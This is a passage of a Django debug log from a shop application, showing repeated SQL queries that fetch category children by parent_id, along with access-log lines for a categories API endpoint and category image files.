ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:44:42,230 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:44:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:44:43] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:44:43] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 12:46:02,687 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:46:02,694 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:46:02,697 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:46:02,699 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:46:02,703 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:46:02,705 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:46:02,707 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:46:02,709 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:46:02,711 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:46:02,715 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:46:02,717 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:46:02,719 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:46:02,721 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:46:02,724 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:46:02,727 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:46:02,729 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:46:02,732 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:46:02,734 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:46:02,736 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:46:02,740 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:46:02,742 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:46:02,745 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:46:02,748 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:46:02,751 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:46:02,753 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:46:02,757 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:46:02,759 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:46:02,761 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:46:02,764 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:46:02,766 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:46:02,769 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:46:02,771 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:46:02,773 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:46:02,775 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:46:02,778 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:46:02,781 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:46:02,783 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:46:02,786 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:46:02,789 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:46:02,793 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:46:02,795 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:46:02,798 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:46:02,800 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:46:02,803 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:46:02,806 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:46:02,809 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:46:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:46:04] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:46:04] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 12:46:06,384 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:46:06,393 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:46:06,397 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:46:06,399 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:46:06,403 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:46:06,405 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:46:06,408 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:46:06,410 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:46:06,413 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:46:06,416 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:46:06,419 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:46:06,421 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:46:06,424 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:46:06,426 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:46:06,429 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:46:06,432 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:46:06,434 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:46:06,437 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:46:06,440 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:46:06,444 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 